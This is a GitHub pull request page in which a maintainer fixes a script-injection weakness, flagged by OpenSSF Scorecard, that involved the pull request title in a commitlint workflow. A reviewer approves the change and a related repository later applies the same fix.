Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

chore: fixed the Dangerous-Workflow #578

Merged
merged 1 commit into from
Feb 15, 2024
Merged

chore: fixed the Dangerous-Workflow #578

merged 1 commit into from
Feb 15, 2024

Conversation

naveensrinivasan
Copy link
Member

@naveensrinivasan naveensrinivasan commented Feb 15, 2024
edited
Loading

Description

Fixed the dangerous workflow
Warn: script injection with untrusted input ' github.event.pull_request.title ': .github/workflows/commitlint.yml:28

https://securityscorecards.dev/viewer/?uri=github.com/defenseunicorns/pepr
https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections
...

Related Issue

Fixes #

Relates to #

Type of change

  • Bug fix (non-breaking change which fixes an issue)
  • New feature (non-breaking change which adds functionality)
  • Other (security config, docs update, etc)

Checklist before merging

@naveensrinivasan
Fixed the Dangerous-Workflow
1a462d6 
Fixed the dangerous workflow
Warn: script injection with untrusted input ' github.event.pull_request.title ': .github/workflows/commitlint.yml:28

https://securityscorecards.dev/viewer/?uri=github.com/defenseunicorns/pepr

Signed-off-by: naveensrinivasan <172697+naveensrinivasan@users.noreply.github.com>
@naveensrinivasan naveensrinivasan changed the title Fixed the Dangerous-Workflow chore: Fixed the Dangerous-Workflow Feb 15, 2024
@naveensrinivasan naveensrinivasan changed the title chore: Fixed the Dangerous-Workflow chore: fixed the Dangerous-Workflow Feb 15, 2024
btlghrants
btlghrants approved these changes Feb 15, 2024
View reviewed changes
Copy link
Collaborator

@btlghrants btlghrants left a comment
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Had to go digging for an explanation of the fix (here) and it was quite illuminating.

Nice find -- thx for the PR!

@btlghrants btlghrants merged commit f1cfbd5 into defenseunicorns:main Feb 15, 2024
8 of 15 checks passed
@naveensrinivasan naveensrinivasan deleted the naveen/scorecard branch February 16, 2024 15:47
@lucasrod16 lucasrod16 mentioned this pull request Apr 8, 2024
Merged
cmwylie19 pushed a commit to defenseunicorns/kubernetes-fluent-client that referenced this pull request Apr 8, 2024
@lucasrod16
fix: commitlint workflow (#210)
20cdf9f 
Same fix as the following:

- defenseunicorns/pepr#578
- defenseunicorns/zarf#2418
- defenseunicorns/pkg#60
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@btlghrants btlghrants btlghrants approved these changes

@jeff-mccoy jeff-mccoy Awaiting requested review from jeff-mccoy jeff-mccoy is a code owner

@cmwylie19 cmwylie19 Awaiting requested review from cmwylie19 cmwylie19 is a code owner

@schaeferka schaeferka Awaiting requested review from schaeferka schaeferka is a code owner

Assignees
No one assigned
Labels
None yet
Projects
Pepr Project Board
Status: ✅ Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@naveensrinivasan @btlghrants